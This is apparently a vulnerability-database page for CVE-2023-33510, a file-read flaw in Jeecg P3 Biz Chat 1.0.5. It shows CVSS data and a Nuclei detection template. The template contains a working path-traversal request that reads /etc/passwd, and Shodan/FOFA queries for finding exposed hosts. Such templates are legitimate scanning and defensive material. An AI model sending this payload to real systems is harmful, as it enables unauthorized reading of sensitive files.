Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-33510
HistoryJun 19, 2023 - 9:56 a.m.

Jeecg P3 Biz Chat - Local File Inclusion

2023-06-1909:56:15
ProjectDiscovery
github.com
11
cve2023
jeecg
lfi
jeecg_p3_biz_chat_project
wordpress

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.006

Percentile

78.4%

Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.
id: CVE-2023-33510

info:
  name: Jeecg P3 Biz Chat - Local File Inclusion
  author: DhiyaneshDK
  severity: high
  description: |
    Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in Jeecg P3 Biz Chat.
  reference:
    - https://twitter.com/momika233/status/1670701256535572481
    - https://carl1l.github.io/2023/05/08/jeecg-p3-biz-chat-1-0-5-jar-has-arbitrary-file-read-vulnerability/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33510
    - https://github.com/izj007/wechat
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-33510
    cwe-id: CWE-668
    epss-score: 0.00406
    epss-percentile: 0.73689
    cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: jeecg_p3_biz_chat_project
    product: jeecg_p3_biz_chat
    framework: wordpress
    shodan-query: http.favicon.hash:1380908726
    fofa-query: icon_hash=1380908726
  tags: cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress

http:
  - method: GET
    path:
      - "{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220171abcc1c0a83a429a04ba26dc24dbabb63a86500669886aac8290f2fe0e7c81022100a1b42db8bf7ef06ccf26e400d065cc3b7b4871399e0b76c0500aa7b121e4b29e:922c64590222798bb761d5b6d8e72950

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.006

Percentile

78.4%

Related for NUCLEI:CVE-2023-33510